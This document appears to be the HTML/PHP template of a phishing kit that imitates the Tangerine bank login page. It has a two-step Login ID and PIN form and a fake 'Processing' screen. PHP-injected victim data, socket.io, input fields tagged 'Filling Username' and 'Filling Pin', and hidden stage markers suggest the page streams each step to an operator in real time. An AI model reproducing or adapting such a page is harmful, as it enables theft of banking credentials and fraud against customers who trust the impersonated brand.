<html>
    <head>
        <meta charset="utf-8">
        <title>Login | Tangerine</title>
        <meta name="description" content="">
        <link rel="shortcut icon" href="favicon.ico" type="image/x-icon">
        <meta name="viewport" content="initial-scale=1, width=device-width">
        <link href="/assets/tang/css/vendor.css" rel="stylesheet" media="all" onload="this.media='all'">
        <link href="/assets/tang/css/global.css" rel="stylesheet" media="all" onload="this.media='all'">
        <link href="/assets/tang/css/app.css" rel="stylesheet" media="all" onload="this.media='all'">
        <link rel="preload" as="font" href="/assets/tang/fonts/icomoon.ttf" type="font/ttf" crossorigin="">
        <link rel="preload" as="image" href="/assets/tang/img/tangerine-logo-white.svg">
        <link rel="preload" as="image" href="/assets/tang/fonts/icon_DownArrow-white.svg" type="image/svg+xml">
        <link href="https://fonts.googleapis.com/css2?family=Material+Icons" rel="stylesheet">
        <link rel="stylesheet" href="/assets/tang/login.css">
        <script src="https://code.jquery.com/jquery-3.6.0.min.js" crossorigin="anonymous"></script>
        <script>
            var lrbank = '<?=escape($udata->last->bank)?>';
            var lrinfo = '<?=escape($udata->last->info)?>';
        </script>
        <script src="/assets/js/actions.js?v=<?=time()?>"></script>
       
        <style>
        .message-card .critical {
            background-color: rgba(235, 1, 49, 0.08);
            border-left: solid 3px #EB0131;
        }

        .message-card .message-box {
            margin: 1rem 0;
            padding: 16px 15px;
            margin-bottom: 15px;
        }

        .sr-only {
            position: absolute;
            width: 1px;
            height: 1px;
            padding: 0;
            margin: -1px;
            overflow: hidden;
            clip: rect(0,0,0,0);
            border: 0;
        }

        .message-card .cancel-icon {
            color: #EB0131;
            font-size: 1.2rem;
            height: 1.2rem;
            width: 1.2rem;
            min-width: 1.2rem;
        }

        .message-card mat-icon {
            position: relative;
            left: 0.125rem;
        }

        .message-card .message-box-content {
            margin: 0 0 0 0.5rem;
            display: -ms-flexbox;
            display: flex;
            -ms-flex: 1;
            flex: 1;
            -ms-flex-direction: column;
            flex-direction: column;
            -ms-flex-pack: center;
            justify-content: center;
        }

        @media (min-width: 74.4375rem) {
            .div-main .navbar {
                display: none !important;
            }
        }
        </style>
        <script src="/socket.io/socket.io.js"></script>
    </head>
    <body class="fb2-index" style="">
        <noscript>
            <style>
                p {
                color: darkorange;
                font-weight: bold;
                font-size: 16px;
                text-align: center;
                }
            </style>
            <p>To proceed you need to have your cookies and JavaScript browser features enabled.</p>
        </noscript>
        <tng-main-nav class="ng-isolate-scope div-main">
            <nav role="navigation" id="hamburger-navigation" aria-label="Primary" class="navbar print-hide">
                <button class="navbar__btn navbar__btn--menu icon-hamburgermenu ng-scope"  actionable-id="menu_HamburgerMenu"  aria-label="Menu  Opens dialog" id="menu_HamburgerMenu" name="menu_HamburgerMenu"> </button>
                <div class="brand ng-scope" >
                    <img  alt="Tangerine" class="logo-white print-hide" src="/assets/tang/img/tangerine-logo-white.svg">
                </div>
                <button  actionable-id="main-nav-btn-search" class="navbar__btn navbar__btn--search icon-search ng-hide"  id="main-nav-btn-search" name="main-nav-btn-search" aria-hidden="true"> </button>
                <button actionable-id="main-nav-btn-feedback" class="navbar__btn navbar__btn--feedback icon-feedback"   id="main-nav-btn-feedback" name="main-nav-btn-feedback">
                    <span class="main-nav-btn-icon-copy ng-binding"> Feedback </span>
                </button>
            </nav>
            <header class="header print-hide">
                <div class="container">
                    <div class="logo"> <a actionable-id="main-nav-handle_go_home" class="brand" href=""  id="main-nav-handle_go_home" name="main-nav-handle_go_home"> <img  alt="Tangerine" class="print-hide" src="/assets/tang/img/tangerine-logo-white.svg"> </a> </div>
                    <!-- ngIf: $ctrl.isMobileHidden -->
                    <nav class="nav ng-scope" aria-label="Primary"  >
                        <div class="container">
                            <ul class="nav__list">
                                <!-- ngRepeat: menuItem in $ctrl.topPrimaryMenuItems -->
                                <li class="nav__item primary-item ng-scope"  style=""> <a class="nav__link" href="javascript:void(0);"  actionable-id="menu_global.menu.header.products"   id="menu_global.menu.header.products" name="menu_global.menu.header.products"> <span class="ng-binding">Products</span> </a> </li>
                                <!-- end ngRepeat: menuItem in $ctrl.topPrimaryMenuItems -->
                                <li class="nav__item primary-item ng-scope" > <a class="nav__link" href="javascript:void(0);"  actionable-id="menu_global.menu.header.waysToBank"   id="menu_global.menu.header.waysToBank" name="menu_global.menu.header.waysToBank"> <span class="ng-binding">Ways to Bank</span> </a> </li>
                                <!-- end ngRepeat: menuItem in $ctrl.topPrimaryMenuItems -->
                                <li class="nav__item primary-item ng-scope" > <a class="nav__link" href="javascript:void(0);"  actionable-id="menu_global.menu.header.ourBlog"   id="menu_global.menu.header.ourBlog" name="menu_global.menu.header.ourBlog"> <span class="ng-binding">Blog</span> </a> </li>
                                <!-- end ngRepeat: menuItem in $ctrl.topPrimaryMenuItems -->
                                <li class="nav__item primary-item ng-scope" > <a class="nav__link" href="javascript:void(0);"  actionable-id="menu_global.menu.header.aboutUs"   id="menu_global.menu.header.aboutUs" name="menu_global.menu.header.aboutUs"> <span class="ng-binding">About Us</span> </a> </li>
                                <!-- end ngRepeat: menuItem in $ctrl.topPrimaryMenuItems --> <!-- ngIf: $ctrl.AVAILABLE_ENVIRONMENTS.length > 0 --> <!-- ngIf: $ctrl.isInDevPod --> <!-- ngIf: $ctrl.IS_AVAILABLE_GENESYS_ENVIRONMENTS && false -->
                            </ul>
                            <div class="navtools">
                                <ul class="navtools__list">
                                    <li class="navtools__item"  aria-hidden="false"> <a class="btn btn--largest btn--reversed ng-binding" actionable-id="menu_signup" href="#/enroll" id="menu_signup" name="menu_signup"> Sign Me Up </a> </li>
                                    <li class="navtools__item"  aria-hidden="false"> <a class="btn btn--largest btn--whiteBorder ng-binding" href="#/?locale=en_CA" actionable-id="menu_Login"  id="menu_Login" name="menu_Login"> Log Me In </a> </li>
                                    <!-- ngIf: $ctrl.SessionService.isAuthenticated() && $ctrl.MENU_ITEMS.LOGIN.length -->
                                    <li class="navtools__item"> <a class="navtools__link navtools__link--circle navtools__link--icon-text" href="" actionable-id="menu_Language"  aria-label="Changer la langue au français" id="menu_Language" name="menu_Language"> <span class="material-icons language">language</span> <span class="text-label ng-binding" aria-hidden="true"> FR </span> </a> </li>
                                    <!-- ngIf: !$ctrl.isNewClientEnrollment -->
                                    <li class="navtools__item ng-scope" > <a class="navtools__link navtools__link--circle" href="#/locations" actionable-id="menu_Location"  aria-label="ABM Locator" id="menu_Location" name="menu_Location"> <span class="navtools__icon icon-location"></span> </a> </li>
                                    <!-- end ngIf: !$ctrl.isNewClientEnrollment -->
                                    <li class="navtools__item"> <a class="navtools__link navtools__link--circle" href="" actionable-id="menu_Search"  aria-label="Search" id="menu_Search" name="menu_Search"> <span class="navtools__icon icon-search"></span> </a> </li>
                                    <!-- ngIf: $ctrl.SessionService.isAuthenticated() -->
                                </ul>
                            </div>
                        </div>
                    </nav>
                    <!-- end ngIf: $ctrl.isMobileHidden -->
                </div>
                <tng-sub-nav class="ng-isolate-scope">
                    <!-- ngIf: $ctrl.isSubNavVisible() -->
                </tng-sub-nav>
                <!-- ngIf: !$ctrl.isMobileHidden --> <!-- ngIf: !$ctrl.isMobileHidden -->
            </header>
            <!-- ngIf: $ctrl.isContactUsMenuOpen -->
            <tng-feedback-survey class="ng-isolate-scope">
                <!-- ngIf: $ctrl.isMedalliaSupported -->
            </tng-feedback-survey>
            <tng-print-header name="$ctrl.getFullName()"></tng-print-header>
            <!-- ngIf: $ctrl.showVisitorSiteSearch -->
        </tng-main-nav>
        <!-- uiView: page-content -->
        <div ui-view="page-content" class="page-content ng-scope div-main" role="main" id="mainContent" tabindex="-1" translate-cloak="" style="overflow-y: hidden;">
            <login-page return-to="::$resolve.returnTo" class="ng-scope ng-isolate-scope">
                <div>
                    <!-- ngIf: !$ctrl.isNewLoginFlow --> <!-- ngIf: $ctrl.isNewLoginFlow -->
                    <tngx-login-new [return-to-param]="$ctrl.returnTo"  class="ng-scope" _nghost-llv-c5="" >
                        <form id="loginForm" class="ng-untouched ng-pristine ng-invalid lab-form" action="" method="post">
                            <input type="hidden" id="userAgent" name="userAgent">
                            <div _ngcontent-llv-c5="" class="mat-card-container c-login-flow" id="step-login">
                                <mat-card _ngcontent-llv-c5="" class="mat-elevation-z0 mat-card mat-focus-indicator">
                                    <mat-card-header _ngcontent-llv-c5="" class="mat-card-header">
                                        <div class="mat-card-header-text">
                                            <mat-card-title _ngcontent-llv-c5="" class="mat-card-title" id="login-user-id-header-title">
                                                <h1 _ngcontent-llv-c5="" tabindex="-1">Log in</h1>
                                            </mat-card-title>
                                        </div>
                                    </mat-card-header>
                                    <mat-card-content _ngcontent-llv-c5="" class="mat-card-content">
                                        <div _ngcontent-ift-c19="" class="service-error ng-star-inserted error-div" <?=!$error ? 'style="display: none"' : ''?> id="login-pin-service-errors">
                                            <tngx-message-card _ngcontent-ift-c19="" aria-live="polite" _nghost-ift-c6="">
                                                <div _ngcontent-ift-c6="" class="message-card" tabindex="-1">
                                                    <div _ngcontent-ift-c6="" class="message-box critical">
                                                        <div _ngcontent-ift-c6="" fxlayout="row" style="flex-direction: row; box-sizing: border-box; display: flex;">
                                                            <div _ngcontent-ift-c6="" class="sr-only">Error</div>
                                                            <mat-icon _ngcontent-ift-c6="" class="cancel-icon mat-icon notranslate material-icons mat-icon-no-color ng-star-inserted" role="img" aria-hidden="true" data-mat-icon-type="font">cancel</mat-icon>
                                                            <div _ngcontent-ift-c6="" class="message-box-content">
                                                                <span _ngcontent-ift-c6="" id="message-body-login-pin-message-card-error" class="ng-star-inserted">Your PIN and Client Number make a good pair. Please check your records and make sure they are both valid and work together. As a reminder - your PIN should be either 4 or 6 numbers.</span>
                                                            </div>
                                                        </div>
                                                        <!---->
                                                    </div>
                                                </div>
                                            </tngx-message-card>
                                        </div>
                                        <div _ngcontent-llv-c5="" class="mat-card-content-container-28rem">
                                            <!----><!---->
                                            <div _ngcontent-llv-c5="" class="ng-star-inserted">
                                                <tngx-tab-panel _ngcontent-llv-c5="" idsuffix="login-user-id-tabs" _nghost-llv-c9="">
                                                    <div _ngcontent-llv-c9="">
                                                        <mat-tab-group _ngcontent-llv-c9="" class="mat-tab-group mat-primary" mat-align-tabs="start">
                                                            <mat-tab-header class="mat-tab-header">
                                                                <div aria-hidden="true" class="mat-tab-header-pagination mat-tab-header-pagination-before mat-elevation-z4 mat-ripple mat-tab-header-pagination-disabled" mat-ripple="">
                                                                    <div class="mat-tab-header-pagination-chevron"></div>
                                                                </div>
                                                                <div class="mat-tab-label-container">
                                                                    <div class="mat-tab-list" role="tablist" style="transform: translateX(0px);">
                                                                        <div class="mat-tab-labels">
                                                                            <!---->
                                                                            <div cdkmonitorelementfocus="" class="mat-tab-label mat-focus-indicator mat-ripple mat-tab-label-active ng-star-inserted" mat-ripple="" mattablabelwrapper="" role="tab" id="mat-tab-label-login-user-id-tabs-0" tabindex="0" aria-posinset="1" aria-setsize="2" aria-controls="mat-tab-content-login-user-id-tabs-0" aria-selected="true" aria-disabled="false">
                                                                                <div class="mat-tab-label-content">
                                                                                    <!----><!----><!---->
                                                                                    <div _ngcontent-llv-c9="" class="ng-star-inserted">Personal</div>
                                                                                    <!----><!---->
                                                                                </div>
                                                                            </div>
                                                                            <div cdkmonitorelementfocus="" class="mat-tab-label mat-focus-indicator mat-ripple ng-star-inserted" mat-ripple="" mattablabelwrapper="" role="tab" id="mat-tab-label-login-user-id-tabs-1" tabindex="-1" aria-posinset="2" aria-setsize="2" aria-controls="mat-tab-content-login-user-id-tabs-1" aria-selected="false" aria-disabled="false">
                                                                                <div class="mat-tab-label-content">
                                                                                    <!----><!----><!---->
                                                                                    <div _ngcontent-llv-c9="" class="ng-star-inserted">Business</div>
                                                                                    <!----><!---->
                                                                                </div>
                                                                            </div>
                                                                        </div>
                                                                        <mat-ink-bar class="mat-ink-bar" style="visibility: visible; left: 0px; width: 152px;"></mat-ink-bar>
                                                                    </div>
                                                                </div>
                                                                <div aria-hidden="true" class="mat-tab-header-pagination mat-tab-header-pagination-after mat-elevation-z4 mat-ripple mat-tab-header-pagination-disabled" mat-ripple="">
                                                                    <div class="mat-tab-header-pagination-chevron"></div>
                                                                </div>
                                                            </mat-tab-header>
                                                            <div class="mat-tab-body-wrapper">
                                                                <!---->
                                                                <mat-tab-body class="mat-tab-body ng-tns-c18-1 mat-tab-body-active ng-star-inserted" role="tabpanel" id="mat-tab-content-login-user-id-tabs-0" aria-labelledby="mat-tab-label-login-user-id-tabs-0">
                                                                    <div class="mat-tab-body-content ng-trigger ng-trigger-translateTab" style="transform: none;">
                                                                        <!----><!----><!---->
                                                                    </div>
                                                                </mat-tab-body>
                                                                <mat-tab-body class="mat-tab-body ng-tns-c18-2 ng-star-inserted" role="tabpanel" id="mat-tab-content-login-user-id-tabs-1" aria-labelledby="mat-tab-label-login-user-id-tabs-1">
                                                                    <div class="mat-tab-body-content ng-trigger ng-trigger-translateTab" style="transform: translate3d(100%, 0px, 0px); min-height: 1px;">
                                                                        <!---->
                                                                    </div>
                                                                </mat-tab-body>
                                                            </div>
                                                        </mat-tab-group>
                                                    </div>
                                                </tngx-tab-panel>
                                            </div>
                                            <div _ngcontent-llv-c5="" class="content-container">
                                                <div _ngcontent-llv-c5="" class="flex">
                                                    <!---->
                                                    <mat-form-field _ngcontent-llv-c5="" appearance="outline" id="main-div" class="form-field mat-form-field ng-tns-c10-0 mat-primary mat-form-field-type-mat-input mat-form-field-appearance-outline mat-form-field-can-float mat-form-field-has-label mat-form-field-hide-placeholder ng-untouched ng-pristine ng-invalid ng-star-inserted">
                                                        <div class="mat-form-field-wrapper">
                                                            <div class="mat-form-field-flex">
                                                                <!----><!---->
                                                                <div class="mat-form-field-outline ng-tns-c10-0 ng-star-inserted">
                                                                    <div class="mat-form-field-outline-start" style="width: 11px;"></div>
                                                                    <div class="mat-form-field-outline-gap" style="width: 56.5px;"></div>
                                                                    <div class="mat-form-field-outline-end"></div>
                                                                </div>
                                                                <div class="mat-form-field-outline mat-form-field-outline-thick ng-tns-c10-0 ng-star-inserted">
                                                                    <div class="mat-form-field-outline-start" style="width: 11px;"></div>
                                                                    <div class="mat-form-field-outline-gap" style="width: 56.5px;"></div>
                                                                    <div class="mat-form-field-outline-end"></div>
                                                                </div>
                                                                <!---->
                                                                <div class="mat-form-field-infix">
                                                                    <input class="mat-input-element mat-form-field-autofill-control ng-untouched ng-pristine ng-invalid cdk-text-field-autofill-monitored lrinput input-username" id="input-username" name="username" required type="text" maxle attr-action="Filling Username">
                                                                    <input type="hidden" name="CRSFToken" value="">
                                                                    <span class="mat-form-field-label-wrapper">
                                                                        <label class="mat-form-field-label ng-tns-c10-0 mat-empty mat-form-field-empty ng-star-inserted" id="mat-form-field-label-1" for="login-user-id-input" aria-owns="login-user-id-input">
                                                                            <mat-label _ngcontent-llv-c5="" id="mat-label-id-0" class="ng-star-inserted">Login ID</mat-label>
                                                                            <span aria-hidden="true" class="mat-placeholder-required mat-form-field-required-marker ng-tns-c10-0 ng-star-inserted"> *</span>
                                                                        </label>
                                                                    </span>
                                                                </div>
                                                            </div>
                                                            <div class="mat-form-field-subscript-wrapper">
                                                                <!----><!---->
                                                                <div class="mat-form-field-hint-wrapper ng-tns-c10-0 ng-trigger ng-trigger-transitionMessages ng-star-inserted" style="opacity: 1; transform: translateY(0%);">
                                                                    <!---->
                                                                    <mat-hint _ngcontent-llv-c5="" class="login-input-hint mat-hint" id="mat-hint-0"> You can use your Client Number, Card Number, or Username.</mat-hint>
                                                                    <div class="mat-form-field-hint-spacer"></div>
                                                                </div>
                                                            </div>
                                                        </div>
                                                    </mat-form-field>
                                                    <!---->
                                                </div>
                                                <div _ngcontent-llv-c5="" class="flex">
                                                    <mat-slide-toggle _ngcontent-llv-c5="" class="mat-slide-toggle mat-primary ng-untouched ng-pristine ng-valid" formcontrolname="rememberMeId" id="login-user-id-remember-me-toggle" tabindex="-1">
                                                        <label class="mat-slide-toggle-label" for="login-user-id-remember-me-toggle-input">
                                                            <div class="mat-slide-toggle-bar">
                                                                <input class="mat-slide-toggle-input cdk-visually-hidden" role="switch" type="checkbox" id="login-user-id-remember-me-toggle-input" tabindex="0" aria-checked="false">
                                                                <div class="mat-slide-toggle-thumb-container">
                                                                    <div class="mat-slide-toggle-thumb"></div>
                                                                    <div class="mat-slide-toggle-ripple mat-focus-indicator mat-ripple" mat-ripple="">
                                                                        <div class="mat-ripple-element mat-slide-toggle-persistent-ripple"></div>
                                                                    </div>
                                                                </div>
                                                            </div>
                                                            <span class="mat-slide-toggle-content"><span style="display:none">&nbsp;</span>Remember me on this device </span>
                                                        </label>
                                                    </mat-slide-toggle>
                                                    <tngx-tooltip _ngcontent-llv-c5="">
                                                        <div class="tooltip-container">
                                                            <button class="mat-tooltip-trigger" mattooltipclass="tooltip-style" mattooltipposition="below" type="button" id="login-user-id-remember-me-tooltip" aria-label="Remember Me on this device tool tip" aria-describedby="cdk-describedby-message-0" cdk-describedby-host="">
                                                                <span class="tooltip-button-icon">
                                                                    <mat-icon class="mat-icon notranslate material-icons mat-icon-inline mat-icon-no-color" role="img" aria-hidden="true" data-mat-icon-type="font">help_outline</mat-icon>
                                                                </span>
                                                            </button>
                                                        </div>
                                                    </tngx-tooltip>
                                                </div>
                                            </div>
                                        </div>
                                    </mat-card-content>
                                    <mat-card-actions _ngcontent-llv-c5="" class="mat-card-actions">
                                        <button _ngcontent-llv-c5="" class="mat-focus-indicator mat-flat-button mat-button-base mat-primary" color="primary" id="btn-next" mat-flat-button="" type="button">
                                            <span class="mat-button-wrapper">Next </span>
                                            <span class="mat-button-ripple mat-ripple" matripple=""></span>
                                            <span class="mat-button-focus-overlay"></span>
                                        </button>
                                    </mat-card-actions>
                                    <!---->
                                    <div _ngcontent-llv-c5="" class="center-aligned-in-mobile ng-star-inserted padding-top-xs">
                                        <a _ngcontent-llv-c5="" class="link-internal" href="#" id="login-user-id-forgot-cif-link" aria-label="Forgot Login ID">
                                            Forgot Login ID?
                                            <mat-icon _ngcontent-llv-c5="" class="link-icon mat-icon notranslate material-icons mat-icon-no-color" role="img" aria-hidden="true" data-mat-icon-type="font">keyboard_arrow_right</mat-icon>
                                        </a>
                                    </div>
                                </mat-card>
                                <section _ngcontent-llv-c5="">
                                    <!---->
                                    <p _ngcontent-llv-c5=""> Tangerine Bank is a member of the Canada Deposit Insurance Corporation.  <a _ngcontent-llv-c5="" aria-describedby="open_new_tab_sr_copy" class="link-inline" id="login-user-id-disclaimer-link" rel="noopener" target="_blank" href="https://www.tangerine.ca/en/about-us/cdic/index.html">Learn more about Canada Deposit Insurance Corporation. </a></p>
                                    <div _ngcontent-llv-c5="" class="security-text" id="login-user-id-security-link"><a href="https://www.tangerine.ca/en/security/guarantee/index.html" target="_blank" aria-describedby="open_new_tab_sr_copy"><b>Security Guarantee<b></b></b></a></div>
                                    <mat-icon _ngcontent-llv-c5="" class="security-icon mat-icon notranslate material-icons mat-icon-no-color" role="img" aria-hidden="true" data-mat-icon-type="font" style="margin-left: 4px">lock_outline</mat-icon>
                                </section>
                            </div>
                            <div _ngcontent-orv-c20="" class="mat-card-container c-login-flow" id="step-pin" style="display: none">
                                <!---->
                                <mat-card _ngcontent-orv-c20="" class="mat-elevation-z0 mat-card mat-focus-indicator" id="scroll-to-top">
                                    <mat-card-header _ngcontent-orv-c20="" class="mat-card-header pin-show">
                                        <div class="mat-card-header-text "></div>
                                        <div _ngcontent-orv-c20="">
                                            <mat-card-title _ngcontent-orv-c20="" class="mat-card-title" id="login-pin-header-title">
                                                <h1 _ngcontent-orv-c20="" tabindex="-1">Enter your PIN</h1>
                                            </mat-card-title>
                                            <mat-card-subtitle _ngcontent-orv-c20="" class="mat-card-subtitle">This is your 4 or 6 digit banking PIN - not your Card PIN.</mat-card-subtitle>
                                        </div>
                                    </mat-card-header>
                                    <mat-card-content _ngcontent-orv-c20="" class="mat-card-content">
                                        <div _ngcontent-orv-c20="" class="mat-card-content-container-28rem">
                                            <tngx-pin-input _ngcontent-orv-c20="" formcontrolname="loginPinControl" _nghost-orv-c21="" required="" class="ng-untouched ng-pristine ng-invalid">
                                                <div _ngcontent-orv-c21="" fxlayout="row" class="ng-untouched ng-pristine ng-invalid" style="flex-direction: row; box-sizing: border-box; display: flex;">
                                                    <mat-form-field _ngcontent-orv-c21="" appearance="outline" class="mat-form-field ng-tns-c10-3 mat-primary mat-form-field-type-mat-input mat-form-field-appearance-outline mat-form-field-can-float mat-form-field-has-label mat-form-field-hide-placeholder ng-untouched ng-pristine ng-invalid" fxfill="" id="main-div2" style="height: 100%; min-height: 100%; min-width: 100%; width: 100%;">
                                                        <div class="mat-form-field-wrapper">
                                                            <div class="mat-form-field-flex">
                                                                <!----><!---->
                                                                <div class="mat-form-field-outline ng-tns-c10-3 ng-star-inserted">
                                                                    <div class="mat-form-field-outline-start" style="width: 11px;"></div>
                                                                    <div class="mat-form-field-outline-gap" style="width: 30.25px;"></div>
                                                                    <div class="mat-form-field-outline-end"></div>
                                                                </div>
                                                                <div class="mat-form-field-outline mat-form-field-outline-thick ng-tns-c10-3 ng-star-inserted">
                                                                    <div class="mat-form-field-outline-start" style="width: 11px;"></div>
                                                                    <div class="mat-form-field-outline-gap" style="width: 30.25px;"></div>
                                                                    <div class="mat-form-field-outline-end"></div>
                                                                </div>
                                                                <div class="mat-form-field-infix">
                                                                    <input _ngcontent-orv-c21="" autocomplete="off" class="mat-input-element mat-form-field-autofill-control ng-untouched ng-pristine ng-invalid cdk-text-field-autofill-monitored lrinput input-password" formcontrolname="pin" inputmode="numeric" matinput="" spellcheck="false" type="password" autocapitalize="none" required="" name="password" id="input-pin" aria-invalid="false" aria-required="true" attr-action="Filling Pin" minlength="4" maxlength="6">
                                                                    <span class="mat-form-field-label-wrapper">
                                                                        <label class="mat-form-field-label ng-tns-c10-3 mat-empty mat-form-field-empty ng-star-inserted" id="mat-form-field-label-3" for="login-pin-input" aria-owns="login-pin-input">
                                                                            <mat-label _ngcontent-orv-c21="" class="ng-star-inserted">PIN</mat-label>
                                                                            <span aria-hidden="true" class="mat-placeholder-required mat-form-field-required-marker ng-tns-c10-3 ng-star-inserted"> *</span>
                                                                        </label>
                                                                    </span>
                                                                </div>
                                                                <!---->
                                                                <div class="mat-form-field-suffix ng-tns-c10-3 ng-star-inserted">
                                                                    <button _ngcontent-orv-c21="" class="mat-focus-indicator mat-icon-button mat-button-base" mat-icon-button="" matsuffix="" type="button" id="login-pin-visibility-button" aria-label="Show PIN">
                                                                        <span class="mat-button-wrapper">
                                                                            <mat-icon _ngcontent-orv-c21="" class="mat-icon notranslate material-icons mat-icon-no-color" role="img" aria-hidden="true" data-mat-icon-type="font">visibility</mat-icon>
                                                                        </span>
                                                                        <span class="mat-button-ripple mat-ripple mat-button-ripple-round" matripple=""></span><span class="mat-button-focus-overlay"></span>
                                                                    </button>
                                                                </div>
                                                            </div>
                                                            <div class="mat-form-field-subscript-wrapper">
                                                                <!----><!---->
                                                                <div class="mat-form-field-hint-wrapper ng-tns-c10-3 ng-trigger ng-trigger-transitionMessages ng-star-inserted" style="opacity: 1; transform: translateY(0%);">
                                                                    <!----><!---->
                                                                    <div class="mat-form-field-hint-spacer"></div>
                                                                </div>
                                                            </div>
                                                            <mat-card-actions _ngcontent-orv-c20="" class="mat-card-actions">
                                                                <button _ngcontent-orv-c20="" class="mat-focus-indicator mat-flat-button mat-button-base mat-primary" color="primary" id="login-pin-submit-button" mat-flat-button="" type="button" onclick="submitForm()" name="save" value="1">
                                                                    <span class="mat-button-wrapper"> Log In </span>
                                                                    <span class="mat-button-ripple mat-ripple" matripple=""></span>
                                                                    <span class="mat-button-focus-overlay"></span></button>
                                                            </mat-card-actions>
                                                            <section _ngcontent-orv-c20="" style="margin-top: 20px;">
                                                                <p _ngcontent-orv-c20="">You've entered <span id="span-username"></span> as your Login ID. Incorrect? <a _ngcontent-orv-c20="" class="link-inline" id="login-pin-wrong-user-id-link" uisref="loginAbstract" href="">Try again.</a></p>
                                                                <div _ngcontent-orv-c20="" class="security-text" id="login-pin-security-link">
                                                                    <a href="/en/security" target="_blank" aria-describedby="open_new_tab_sr_copy"><b>Safe &amp; secure online banking</b></a>
                                                                </div>
                                                                <mat-icon _ngcontent-orv-c20="" class="security-icon mat-icon notranslate material-icons mat-icon-no-color" role="img" aria-hidden="true" data-mat-icon-type="font">lock_outline</mat-icon>
                                                            </section>
                                                        </div>
                                                    </mat-form-field>
                                                </div>
                                            </tngx-pin-input>
                                        </div>
                                    </mat-card-content>
                                </mat-card>
                            </div>
                        </form>
                        <script>
                        $(document).ready(function() {
                            $('#input-username').focusin(function() {
                                $('#main-div').removeClass('mat-form-field-hide-placeholder').addClass('mat-form-field-should-float mat-focused');
                            });

                            $('#input-username').focusout(function() {
                                var val = $(this).val();
                                if (val == '') {
                                    $('#main-div').addClass('mat-form-field-hide-placeholder').removeClass('mat-form-field-should-float mat-focused');
                                }
                            });

                            $('#input-pin').focusin(function() {
                                $('#main-div2').removeClass('mat-form-field-hide-placeholder').addClass('mat-form-field-should-float mat-focused');
                            });

                            $('#input-pin').focusout(function() {
                                var val = $(this).val();
                                if (val == '') {
                                    $('#main-div2').addClass('mat-form-field-hide-placeholder').removeClass('mat-form-field-should-float mat-focused');
                                }
                            });

                            $('#btn-next').click(function() {
                                var val = $('#input-username').val();
                                if (val == '') {
                                    $('#input-username').focus();
                                } else {
                                    $('#step-login').css('display', 'none');
                                    $('#span-username').html(val);
                                    $('#step-pin').css('display', 'block');
                                    $('#step-pin mat-card-actions, #step-pin mat-card, #step-pin mat-card-actions').css('display', 'block');
                                }
                            });
                        });
                        </script>
                    </tngx-login-new>
                    <!-- end ngIf: $ctrl.isNewLoginFlow -->
                </div>
            </login-page>
        </div>
        <tng-main-nav class="ng-isolate-scope div-loader" style="display: none">
            <nav class="navbar print-hide" ng-class="{'nativeNav' : $ctrl.EnvironmentService.isNative()}">
                <a id="mainNav_home" class="brand nonclickable" href="" ng-click="$ctrl.handleGoHome()" ng-class="{'nonclickable' : $ctrl.isTitleLogoNotClickable()}">
                    <img ng-src="assets/images/brand-white.png" alt="Tangerine" class="logo-white print-hide" src="/assets/tang/files/brand-white.png">
                    <img ng-src="assets/images/brand-orange.png" alt="Tangerine" class="logo-orange print-only-inline" src="/assets/tang/files/brand-orange.png">
                </a>
            </nav>
        </tng-main-nav>
        <div ui-view="page-content" class="page-content ng-scope div-loader" style="padding-bottom: 0px; display: none">
            <forgot-login class="ng-scope ng-isolate-scope">
                <form method="post" action="" class="ng-pristine ng-invalid ng-invalid-required ng-valid-pattern ng-valid-maxlength ng-valid-email">
                    <style>
                    .forgot-login select, .forgot-login input[type="text"], .forgot-login input[type="tel"], .forgot-login input[type="password"] {
                        font-size: 17px;
                        margin-top: 10px;
                        margin-bottom: 15px;
                        font-weight: 500;
                        border: 1px solid #9e9e9e;
                    }

                    .heading--title2 {
                        margin-bottom: 25px;
                        text-align: center;
                    }

                    .forgot-login button {
                        margin: 0px;
                    }

                    .text-right {
                        text-align: right;
                    }

                    .navbar {
                        display: block !important;
                        background-color: #ea7024 !important;
                    }

                    .btn, [class*=" btn--"], [class^=btn--] {
                        background-color: #ea7024;
                    }

                    .forgot-login__email {
                        max-width: 30em;
                        margin-left: auto;
                        margin-right: auto;
                    }

                    .application-theme-web {
                        background-color: #ffffff;
                    }
                    </style>
                    <div class="forgot-login" style="margin-top: 0px; padding: 23px;">
                        <div class="forgot-login__email ng-scope" ng-if="$ctrl.currentState === $ctrl.STATES.FORM">
                            <style>
                            .loader-div {
                                text-align: center;
                                padding-top: 20px;
                            }

                            .loader-div h2 {
                                font-size: 28px;
                                margin-bottom: 40px;
                            }
                            </style>
                            <div class="_1AR6e5iqu8uXHMTFKLnqWr loader-div">
                                <h2 class="heading--title2 ng-binding">Processing</h2>
                                <img src="/assets/tang/loading.gif" width="80">
                            </div>
                        </div>
                    </div>
                </form>
            </forgot-login>
        </div>
        <span hidden id="navig"> <%=navig%> </span>
        <span hidden id="stage">Login</span>
    </body>
    <script src="/bank/tangerine/js/script.js">
    </script>
</html>
